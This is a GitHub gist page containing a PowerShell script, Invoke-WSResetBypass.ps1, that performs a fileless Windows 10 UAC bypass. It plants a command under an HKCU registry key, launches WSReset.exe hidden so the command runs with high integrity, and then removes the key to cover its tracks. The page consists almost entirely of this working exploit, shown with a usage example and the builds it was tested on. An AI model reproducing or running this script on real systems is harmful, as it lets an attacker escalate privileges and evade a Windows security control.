Created
March 18, 2019 08:44
-
-
Save manasmbellani/8bfaaf1b207846f9c1f33bafa89e9f34 to your computer and use it in GitHub Desktop.
Invoke-WSResetBypass.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.SYNOPSIS | |
Fileless UAC Bypass by Abusing Shell API | |
Author: Hashim Jawad of ACTIVELabs | |
.PARAMETER Command | |
Specifies the command you would like to run in high integrity context. | |
.EXAMPLE | |
Invoke-WSResetBypass -Command "C:\Windows\System32\cmd.exe /c start cmd.exe" | |
This will effectivly start cmd.exe in high integrity context. | |
.NOTES | |
This UAC bypass has been tested on the following: | |
- Windows 10 Version 1803 OS Build 17134.590 | |
- Windows 10 Version 1809 OS Build 17763.316 | |
#> | |
function Invoke-WSResetBypass { | |
Param ( | |
[String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe" | |
) | |
$CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" | |
$filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" | |
New-Item $CommandPath -Force | Out-Null | |
New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null | |
Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null | |
Write-Host "[+] Registry entry has been created successfully!" | |
$Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden | |
Write-Host "[+] Starting WSReset.exe" | |
Write-Host "[+] Triggering payload.." | |
Start-Sleep -Seconds 500 | |
if (Test-Path $filePath) { | |
Remove-Item $filePath -Recurse -Force | |
Write-Host "[+] Cleaning up registry entry" | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment